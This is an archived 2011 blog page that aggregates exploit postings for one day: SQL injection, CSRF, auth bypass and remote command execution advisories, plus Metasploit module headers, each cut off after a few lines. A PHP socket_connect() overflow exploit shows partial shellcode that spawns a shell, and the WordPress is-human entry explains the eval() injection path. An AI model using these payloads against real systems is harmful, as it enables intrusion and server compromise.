2011 May 26 | Information Security News and Exploits

##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]

Leave a Comment

[webapps / 0day] – Whitetail Quest <= SQL Injection Vulnerability

May.26, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – XMS Systems <= SQL Injection Vulnerability

May.26, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – Wordpress Plugin Is-human <=1.4.2 Remote Command Execution

May.26, 2011 in Exploits

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run out own code.
In [...]

Leave a Comment

[webapps / 0day] – InHouse CMS <= SQL Injection Vulnerability

May.26, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Trade Line Web <= Remote (id) Funcs SQL-i Vulnerabilities

May.26, 2011 in Exploits

Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Zen Cart <= v1.3.9h Multiple Vulnerabilities

May.26, 2011 in Exploits

[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]

Leave a Comment

[webapps / 0day] – vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – werkform (index.php) <= SQL Injection Vulnerability

May.26, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – xtcModified <= 1.05 (FCKeditor) Multiple Vulnerabilities

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Homepages Admin (index.php) => Auth Bypass Vulnerability

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Ciphertek Systems (snapshots/detail) => SQL Injection Vulnerability

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[local exploits] – PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

May.26, 2011 in Exploits

<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]

Leave a Comment

[webapps / 0day] – AWStats Totals =< v1.14 multisort Remote Command Execution

May.26, 2011 in Exploits

##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]

Leave a Comment

[webapps / 0day] – Clipbucket 2.4 RC2 645 SQL Injection Vulnerability

May.26, 2011 in Exploits

# ————————————————————————
# Software…………….Clipbucket 2.4 RC2 645
# Vulnerability………..SQL Injection
# Threat Level…………Critical (4/5)
# Download…………….http://www.clip-bucket.com/
# Discovery Date……….5/23/2011
# Tested On……………Windows Vista + XAMPP
# ————————————————————————
# Author………………AutoSec Tools
# Site………………..http://www.autosectools.com/
# Email……………….John Leitch <john@autosectools.com>
# ————————————————————————
#
#
# –Description–
#
# A sql injection vulnerability in Clipbucket 2.4 RC2 645 can be
# exploited to extract arbitrary data. In some environments it may be
# possible to create a PHP [...]

Leave a Comment

[webapps / 0day] – Design Extensions (Admin) Auth Bypass/File Upload

May.26, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for May 26th, 2011

[webapps / 0day] – Glasstree <= SQL Injection Vulnerability

[webapps / 0day] – Profshop (cms_display.php)<= Blind SQL Injection Vulnerability

[webapps / 0day] – Web File Browser 0.4b14 => File[Shell]upload / Information Disclosure

[remote exploits] – 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow

[webapps / 0day] – Whitetail Quest <= SQL Injection Vulnerability

[webapps / 0day] – XMS Systems <= SQL Injection Vulnerability

[webapps / 0day] – Wordpress Plugin Is-human <=1.4.2 Remote Command Execution

[webapps / 0day] – InHouse CMS <= SQL Injection Vulnerability

[webapps / 0day] – 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities

[webapps / 0day] – Trade Line Web <= Remote (id) Funcs SQL-i Vulnerabilities

[webapps / 0day] – Zen Cart <= v1.3.9h Multiple Vulnerabilities

[webapps / 0day] – vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

[webapps / 0day] – werkform (index.php) <= SQL Injection Vulnerability

[webapps / 0day] – xtcModified <= 1.05 (FCKeditor) Multiple Vulnerabilities

[webapps / 0day] – Homepages Admin (index.php) => Auth Bypass Vulnerability

[webapps / 0day] – Ciphertek Systems (snapshots/detail) => SQL Injection Vulnerability

[local exploits] – PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

[webapps / 0day] – AWStats Totals =< v1.14 multisort Remote Command Execution

[webapps / 0day] – Clipbucket 2.4 RC2 645 SQL Injection Vulnerability

[webapps / 0day] – Design Extensions (Admin) Auth Bypass/File Upload

Quote

Categories

Calendar

Recent Posts

M	T	W	T	F	S	S
« Apr				Jun »
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30	31